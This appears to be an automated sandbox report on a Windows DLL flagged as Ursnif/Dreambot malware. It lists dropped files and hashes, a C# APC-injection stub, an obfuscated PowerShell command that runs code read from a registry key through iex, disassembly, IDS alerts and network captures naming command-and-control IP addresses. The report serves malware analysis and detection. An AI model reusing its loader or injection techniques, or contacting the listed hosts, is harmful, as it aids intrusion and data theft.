                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):403
                                                        Entropy (8bit):5.058106976759534
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.273397991548263
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbUVRiGzxs7+AEszIwkn23fbUVRib:p37Lvkmb6KRfaWZEif/
                                                        MD5:F97CB66DD8C253FC88F2A1ABDE39CAD4
                                                        SHA1:CAEB7B18048FAE724BAAFC52913BA622C6C35C21
                                                        SHA-256:12B39EEDA56822A7466297663B19E8004B4FFB97B3C790CD4BC9AB0130080271
                                                        SHA-512:4660DC64117C00716A63E2610CC4FD4BF625403A6C4B374B172014D6EEC2F418C44A281A29C1417D76DD8718F924CBDFF9EB02D2B62E48EC3433B77472D329AF
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.620170537753038
                                                        Encrypted:false
                                                        SSDEEP:24:etGSh8OmU0t3lm85xWAseO4zeQ64pfUPtkZfTmmVUWI+ycuZhNH3akSUgPNnq:63XQ3r5xNO1QfUuJTm231ulH3a3U4q
                                                        MD5:1AB06121FBA88EB939FBAEC284269D15
                                                        SHA1:ACECFD28F057FAD1625960F4AF3BDE028FDB56BA
                                                        SHA-256:AE88F1CC1909479D2283B685B88636F95894E4F4531C396F2257EC68B97678EA
                                                        SHA-512:84F2C00719730FC7DD4A187E6D7A5E75D7E56C104FDC4410BBD5F0076FD2D709B1930E4F7C11B9B34C5F81A5768C9D3A674850C10946E0D327ACC1AB928CFFC4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.345180643576188
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                                                        MD5:B7A36CE98A0D245C6F1459976042CA57
                                                        SHA1:AF44D061EF7D477B87C69D38C8A1B82C3A3DC720
                                                        SHA-256:1DF9E43B160A4D953957F36047F09DCD9E147009BCD6EB844965627C6F2F567E
                                                        SHA-512:665CD4C5389E36539F045D8FFCF944F55B137E54DF90623E1DF12A70633B62E729321DA830AA8FA2F3258C422A5AA0C2B11D0A0935DDC37DF8E0C4A2E66E00E6
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1359
                                                        Entropy (8bit):5.382277499613012
                                                        Encrypted:false
                                                        SSDEEP:24:BxSAP7vBZ8x2DOXUWNlLCHMz4qWwHjeTKKjX4CIym1ZJX9VlLCHMz4GnxSAZa:BZDvj8oOtGA4twqDYB1ZHVGA4IZZa
                                                        MD5:D2E7CC2690DF87FB573063E288F90FF2
                                                        SHA1:49378232BF854F6E50F35B02DCA668FBAC9748ED
                                                        SHA-256:03EA7B710A6223D293E530520504E4153472C0FBDDD91F7626001D6D64676FE3
                                                        SHA-512:AD38C82F2AE62AA559ED48561BF3D119F268B2A80B9C042BC9ABAA60AABD070488C8A87DDC5B7A5E57E8CA99819900E6CA5E60F8378DEEE5D4474EC18A430F27
                                                        Malicious:false
                                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504161929..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504161929..**********************..PS>new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([S
                                                        Process:C:\Windows\System32\nslookup.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.039148671903071
                                                        Encrypted:false
                                                        SSDEEP:3:U+6QlBxAN:U+7BW
                                                        MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                        SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                        SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                        SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                        Malicious:false
                                                        Preview:Non-authoritative answer:...
                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.238635401847583
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:2oCOO5LbPu.dll
                                                        File size:442368
                                                        MD5:1217ff59e80cdae525287f2c6e9a43c6
                                                        SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
                                                        SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
                                                        SHA512:7452c0abb46996b098db3caa7c40856eff3407e8f578e85f412af990b8f26a46e59df08a6066069015e2a82b58773c731db33ce3913ca499cff1a420e62ec899
                                                        SSDEEP:6144:rSpWDtyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rSpuFlJqYhiVDwGU8OqaX1WW3zNg7
                                                        TLSH:0594F14977A12DBBEC0807761CF8C51B9B66BE2CA23A31DEA6683CFF7E175511048706
                                                        File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                                                        Icon Hash:9068eccc64f6e2ad
                                                        Entrypoint:0x401430
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add ecx, FFFFFFFFh
                                                        call 00007FC8ACE5154Ch
                                                        pop eax
                                                        pop eax
                                                        mov dword ptr [00414544h], eax
                                                        mov edx, dword ptr [00414660h]
                                                        sub edx, 00005289h
                                                        call edx
                                                        ret
                                                        int3
                                                        push esi
                                                        mov eax, ebx
                                                        mov dword ptr [00414540h], eax
                                                        pop dword ptr [00414538h]
                                                        mov dword ptr [00414548h], ebp
                                                        mov dword ptr [0041453Ch], edi
                                                        sub dword ptr [00414548h], FFFFFFFCh
                                                        loop 00007FC8ACE514F5h
                                                        mov dword ptr [ebp+00h], eax
                                                        nop
                                                        pop ds
                                                        push es
                                                        or al, C2h
                                                        mov byte ptr [7F7A077Eh], al
                                                        retf F3BAh
                                                        pop esp
                                                        cld
                                                        mov byte ptr [764053C9h], al
                                                        inc edi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0737915039062 | data | 1.0233419997 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180297851562 | data | 3.71583062905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373738606771 | data | 6.02811283413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x62360 | 0x666 | data | English | United States
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
RT_ICON | 0x697d0 | 0xea8 | data | English | United States
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
DLL | Import
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
msvcrt.dll | strcoll, fgetwc, srand
Description | Data
LegalCopyright | A Company. All rights reserved.
InternalName |
FileVersion | 1.0.0.0
CompanyName | A Company
ProductName |
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | myfile.exe
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/22-16:19:17.575336 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:21:22.118696 | TCP | 2823044 | ETPRO TROJAN W32.Dreambot Checkin | 49824 | 80 | 192.168.2.4 | 13.107.43.16
05/04/22-16:19:19.326271 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:18:57.385228 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.4 | 13.107.42.16
05/04/22-16:21:20.986284 | TCP | 2031743 | ET TROJAN Ursnif Payload Request (cook32.rar) | 49823 | 80 | 192.168.2.4 | 193.56.146.127
05/04/22-16:21:21.354584 | TCP | 2031744 | ET TROJAN Ursnif Payload Request (cook64.rar) | 49823 | 80 | 192.168.2.4 | 193.56.146.127
05/04/22-16:21:23.154439 | TCP | 2823044 | ETPRO TROJAN W32.Dreambot Checkin | 49825 | 80 | 192.168.2.4 | 116.121.62.237
05/04/22-16:19:18.765869 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:21:35.078524 | TCP | 2831962 | ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 | 49836 | 80 | 192.168.2.4 | 116.121.62.237
05/04/22-16:21:37.325898 | TCP | 2831962 | ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 | 49845 | 80 | 192.168.2.4 | 116.121.62.237
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        May 4, 2022 16:19:17.898389101 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898412943 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898459911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898541927 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898549080 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898578882 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898673058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898674965 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898701906 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898772001 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898889065 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898930073 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898955107 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898988008 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899008036 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899019003 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899024010 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899049997 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899082899 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899107933 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899120092 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899142027 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899166107 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899194956 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899280071 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899641991 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899684906 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899720907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899748087 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899867058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900424004 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900542021 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900691986 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900732994 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900765896 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900778055 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900790930 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900811911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900827885 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900847912 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900861979 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900896072 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900929928 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900932074 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900943041 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900947094 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900957108 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900994062 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901010036 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901045084 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901077032 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901078939 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901107073 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901112080 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901134968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901137114 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901164055 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901170969 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901206970 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901228905 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901242018 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901264906 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901274920 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901299953 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901304960 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901331902 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901433945 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901499987 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901530027 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901592970 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901602983 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901659966 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901671886 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901701927 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901731968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901735067 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901768923 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901789904 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901803017 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901839018 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901843071 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901854992 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901864052 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901890039 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901897907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901932955 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901947975 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901957989 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901983976 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.915769100 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915822983 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915853977 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915888071 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915920019 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915951014 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915952921 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.915982008 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915994883 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916004896 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916037083 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916064978 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916069984 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916083097 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916100979 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916134119 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916156054 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916187048 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916191101 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916198969 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916203976 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916218996 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916240931 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916243076 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916261911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916273117 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916306973 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916325092 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916337967 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916361094 CEST4976180192.168.2.4185.189.151.28
